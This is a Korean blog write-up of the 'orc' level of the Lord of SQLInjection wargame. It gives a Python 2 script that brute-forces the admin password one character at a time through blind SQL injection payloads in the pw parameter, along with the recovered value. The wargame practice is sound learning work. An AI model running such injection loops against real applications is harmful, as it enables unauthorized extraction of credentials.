[LOS] Level4: orc
두비니
·2020. 1. 1. 02:02
Lord Of SQLInjection: lv.4 orc
orc입니다.
pw를 입력받아서 admin의 비밀번호와 같은지 비교해 문제를 푸는 방식의 los네요.
이 경우에는 전수조사를 통해 비밀번호를 한글자씩 알아내야하는데, 저는 python코딩을 이용했습니다.(ver.2.7.15기준)
import httplib
headers = {'Content-Type':'application/x-www-form-urlencoded', 'Cookie':'PHPSESSID=h8vk5n8gafml7kmsgv87809itt'}
conn = httplib.HTTPSConnection('los.rubiya.kr', 443)
pw = ''
for i in range(10):
for j in range(32, 127):
conn.request('GET', '/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20id%20=%20%27admin%27%20and%20ascii(substr(pw,'+str(i)+',1))='+str(j)+'%23','',headers)
r1 = conn.getresponse().read()
if "Hello admin" in r1:
pw += chr(j)
print pw
break
다음 코드를 이용하면 비밀번호 095a9852가 출력되어 문제를 풀 수 있습니다.
짜잔
'War Games > Lord of SQLInjection' 카테고리의 다른 글
[LOS] Level6: orge (0) | 2020.01.04 |
---|---|
[LOS] Level5: wolfman (0) | 2020.01.03 |
[LOS] Level3: goblin (0) | 2019.12.31 |
[LOS] Level2: cobolt (0) | 2019.12.31 |
[LOS] Level1: gremlin (0) | 2019.12.30 |